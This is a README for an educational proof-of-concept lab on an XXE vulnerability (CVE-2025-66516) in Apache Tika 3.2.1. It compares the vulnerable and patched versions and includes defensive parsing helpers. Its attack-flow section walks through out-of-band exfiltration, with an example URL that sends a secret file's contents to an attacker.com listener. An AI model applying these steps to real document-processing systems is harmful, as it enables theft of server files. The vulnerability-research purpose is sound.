# ⚠️ **[READ DISCLAIMER BEFORE USE](DISCLAIMER.md)** ⚠️
**Educational/Authorized Testing Only** | [License](LICENSE) | [Security Policy](SECURITY.md)
---
## Setup POC Directory
```bash
mkdir apache_tika_poc
cd apache_tika_poc
```
## Environment Verification
```bash
# Check Java version
java -version
javac -version
# Check OS version
lsb_release -a
```
## Download Apache Tika JARs
```bash
# Download vulnerable Tika version
wget https://repo1.maven.org/maven2/org/apache/tika/tika-app/3.2.1/tika-app-3.2.1.jar
# Download patched Tika version
wget https://repo1.maven.org/maven2/org/apache/tika/tika-app/3.2.2/tika-app-3.2.2.jar
```
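Before analysing the JARs, it can be worth confirming that the downloads are intact. Maven Central publishes a `.sha1` file next to each artifact (the artifact URL with `.sha1` appended). The sketch below assumes you have downloaded that sidecar file as well; the function names `sha1_of` and `matches_published_sha1` are illustrative and not part of this POC.

```python
import hashlib
from pathlib import Path


def sha1_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Return the hex SHA-1 digest of a file, reading it in chunks."""
    digest = hashlib.sha1()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published_sha1(jar: Path, sha1_file: Path) -> bool:
    """Compare a JAR's digest with the first token of its .sha1 sidecar."""
    # Assumption: the sidecar holds the hex digest as its first token.
    expected = sha1_file.read_text().split()[0].strip().lower()
    return sha1_of(jar) == expected
```

A call such as `matches_published_sha1(Path("tika-app-3.2.1.jar"), Path("tika-app-3.2.1.jar.sha1"))` should return `True` for an untampered download.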
## Verify Component Versions
```bash
# Check vulnerable version manifest
unzip -p tika-app-3.2.1.jar META-INF/MANIFEST.MF
# Check patched version manifest
unzip -p tika-app-3.2.2.jar META-INF/MANIFEST.MF
```
### List Component POM Properties
A Maven Project Object Model (POM) defines a project's dependencies, build configuration, and metadata; the `pom.properties` file packaged with each component records its group ID, artifact ID, and version. Listing these files shows no separate `tika-parsers` component, even though the security advisories mention one. This is probably version-related: the assumption is that in 3.2.1 and 3.2.2, the two versions used in this POC, the `tika-parsers` module has been replaced by individual parser modules.
```bash
# List all component pom.properties files for both versions
unzip -l tika-app-3.2.1.jar | grep pom.properties | grep tika
unzip -l tika-app-3.2.2.jar | grep pom.properties | grep tika
```
### Check Tika Component Versions
```bash
# Check tika-core, tika-parser-pdf-module, and tika-app versions for 3.2.1
unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-core/pom.properties && echo "---" && unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-parser-pdf-module/pom.properties && echo "---" && unzip -p tika-app-3.2.1.jar META-INF/maven/org.apache.tika/tika-app/pom.properties
# Check tika-core, tika-parser-pdf-module, and tika-app versions for 3.2.2
unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-core/pom.properties && echo "---" && unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-parser-pdf-module/pom.properties && echo "---" && unzip -p tika-app-3.2.2.jar META-INF/maven/org.apache.tika/tika-app/pom.properties
```
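The same check can be scripted, which helps when comparing more than a few components. This is a minimal sketch using Python's standard `zipfile` module; `read_pom_properties` is a hypothetical helper name, and the entry path layout is taken from the `unzip` commands above.

```python
import zipfile


def read_pom_properties(jar_path, artifact_id, group_id="org.apache.tika"):
    """Return the key=value pairs from one bundled component's pom.properties."""
    entry = f"META-INF/maven/{group_id}/{artifact_id}/pom.properties"
    with zipfile.ZipFile(jar_path) as jar:
        text = jar.read(entry).decode("utf-8", errors="replace")
    props = {}
    for line in text.splitlines():
        line = line.strip()
        # Skip blank lines, comments, and anything that is not key=value.
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props
```

For example, `read_pom_properties("tika-app-3.2.1.jar", "tika-core").get("version")` returns the version string recorded for `tika-core` in that JAR. A missing component raises `KeyError` from `zipfile`, which is itself a useful signal when an advisory names a module that is not bundled.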
## Create Target File for XXE Exploitation
```bash
# Create target secret file
echo "INTERNAL_SERVER_KEY=EXPOSED" > fake-secrets.txt
```
## Code Analysis: Compare Vulnerable vs Patched
```bash
# Extract vulnerable JAR for analysis
mkdir tika-3.2.1-extract && cd tika-3.2.1-extract && unzip -q ../tika-app-3.2.1.jar && cd ..
# Extract patched JAR for analysis
mkdir tika-3.2.2-extract && cd tika-3.2.2-extract && unzip -q ../tika-app-3.2.2.jar && cd ..
# Disassemble vulnerable class (javap -c prints bytecode, not decompiled source)
cd tika-3.2.1-extract && javap -c org/apache/tika/utils/XMLReaderUtils.class > ../XMLReaderUtils-3.2.1.txt && cd ..
# Disassemble patched class
cd tika-3.2.2-extract && javap -c org/apache/tika/utils/XMLReaderUtils.class > ../XMLReaderUtils-3.2.2.txt && cd ..
# Compare versions
diff -u XMLReaderUtils-3.2.1.txt XMLReaderUtils-3.2.2.txt
```
### Identify The Fix
A careful comparison shows that 3.2.2 disables support for document type definitions (DTDs) and external entities. This is the crux of the fix:
```bash
diff -u XMLReaderUtils-3.2.1.txt XMLReaderUtils-3.2.2.txt | grep -A2 -B2 "accessExternalDTD\|supportDTD\|isSupportingExternalEntities"
```
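If `diff` and `grep` are not available, a rough equivalent can be sketched with Python's `difflib`. Unlike `grep -A2 -B2`, this version returns only added or removed lines that mention a keyword, without surrounding context. The helper name `changed_lines_mentioning` is illustrative; the keywords are copied from the pattern above.

```python
import difflib

# Keywords copied from the grep pattern in this section.
KEYWORDS = ("accessExternalDTD", "supportDTD", "isSupportingExternalEntities")


def changed_lines_mentioning(old_text, new_text, keywords=KEYWORDS):
    """Return added/removed unified-diff lines that mention any keyword."""
    diff = difflib.unified_diff(
        old_text.splitlines(), new_text.splitlines(),
        "3.2.1", "3.2.2", lineterm="",
    )
    hits = []
    for line in diff:
        # Skip the file headers and hunk markers.
        if line.startswith(("+++", "---", "@@")):
            continue
        if line.startswith(("+", "-")) and any(k in line for k in keywords):
            hits.append(line)
    return hits
```

To use it on the disassembly files, pass the contents of `XMLReaderUtils-3.2.1.txt` and `XMLReaderUtils-3.2.2.txt` as `old_text` and `new_text`.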
## POC #1: Local File Read XXE
```bash
# Generate malicious PDF
python3 ./gen_poc.py
# Test with vulnerable Tika 3.2.1
java -jar tika-app-3.2.1.jar -t cve_2025_66516_poc.pdf
# Test with patched Tika 3.2.2
java -jar tika-app-3.2.2.jar -t cve_2025_66516_poc.pdf
```
## POC #2: Out-of-Band XXE
```bash
# Generate out-of-band XXE PDF
python3 ./gen_oob_poc.py
# Start HTTP listener (in separate terminal)
python3 ./http_listener.py
# Test OOB XXE with vulnerable Tika 3.2.1
java -jar tika-app-3.2.1.jar -t cve-2025-66516_OOB_XXE.pdf
# Test OOB XXE with patched Tika 3.2.2
java -jar tika-app-3.2.2.jar -t cve-2025-66516_OOB_XXE.pdf
```
## Application-Level Testing
```bash
# Compile with vulnerable Tika
javac -cp tika-app-3.2.1.jar DocumentProcessor.java
# Run with vulnerable Tika
java -cp tika-app-3.2.1.jar:. DocumentProcessor ./cve_2025_66516_poc.pdf
# Compile with patched Tika
javac -cp tika-app-3.2.2.jar DocumentProcessor.java
# Run with patched Tika
java -cp tika-app-3.2.2.jar:. DocumentProcessor ./cve_2025_66516_poc.pdf
```
## Cleanup
```bash
# Remove extraction directories
rm -rf tika-3.2.2-extract/
rm -rf tika-3.2.1-extract/
rm XMLReaderUtils-*.txt
```
---
## Understanding the Attack Flow
### Local File System XXE Attack Sequence
1. PDF contains XFA stream with DOCTYPE + ENTITY declaration
2. Tika detects XFA → calls XFAExtractor
3. XFAExtractor creates XML parser via XMLReaderUtils
4. Parser processes DOCTYPE, registers xxe entity
5. Parser encounters &xxe; reference
6. Parser resolves entity → reads file:///fake-secrets.txt
7. File contents inserted into XML at &xxe; location
8. XFAExtractor extracts field value = file contents
9. Application receives secret data in Tika output
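
The sequence above depends on step 4: if the parser refuses the DOCTYPE, the entity is never registered and the later steps cannot happen. The sketch below illustrates that idea with Python's standard `xml.parsers.expat` module. It is an analogue for illustration only, not Tika's Java code, and `parse_without_dtd` and `DoctypeForbidden` are hypothetical names.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when the input declares a DOCTYPE."""


def parse_without_dtd(xml_bytes):
    """Parse XML, aborting at the first DOCTYPE declaration.

    Returns the element names seen, in document order.
    """
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Rejecting here means no entity declaration is ever processed.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_bytes, True)
    return names
```

Ordinary XML without a DOCTYPE parses as usual, while any document that declares one is rejected before its entities are seen.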
### Out-of-Band (OOB) XXE Attack Sequence
1. PDF contains XFA with DOCTYPE declaring parameter entities (%file, %dtd)
2. Tika detects XFA → calls XFAExtractor
3. XFAExtractor creates XML parser via XMLReaderUtils
4. Parser processes DOCTYPE, registers %file entity → points to file:///fake-secrets.txt
5. Parser encounters %dtd; reference → points to http://attacker.com:8888/evil.dtd
6. Parser makes HTTP GET request to attacker's server to fetch evil.dtd
7. Attacker's HTTP server receives request, serves evil.dtd content
8. Parser processes evil.dtd: defines %payload entity containing &send definition
9. evil.dtd expands %payload → creates &send entity with exfiltration URL
10. &send entity contains: http://attacker.com:8888/exfil?data=%file;
11. Parser expands %file; inside &send URL โ file contents inserted
12. Parser resolves &send; entity โ makes HTTP GET to exfiltration endpoint
13. Attacker's HTTP server receives /exfil request with file contents in URL parameter
14. Attacker extracts data from URL parameter, logs secret file contents
15. Application output is irrelevant: the data has already been exfiltrated to the attacker's server
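
For triage, it can help to see which external identifiers an XML fragment declares without resolving any of them. The sketch below uses Python's `xml.parsers.expat`, which reports entity declarations through `EntityDeclHandler` and does not fetch external entities unless an `ExternalEntityRefHandler` is installed. The helper name `external_entity_declarations` is hypothetical, and the input is assumed to be XML that has already been extracted from the PDF.

```python
import xml.parsers.expat


def external_entity_declarations(xml_bytes):
    """List (name, is_parameter_entity, system_id) for each entity declared
    with an external identifier. Nothing is fetched or expanded."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # Internal entities have system_id None and are ignored here.
        if system_id is not None:
            found.append((name, bool(is_parameter), system_id))

    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)
    return found
```

Any `file://` or `http://` system identifier in the result corresponds to the kind of declaration described in steps 4 and 5 and is a strong hint that the document deserves closer inspection.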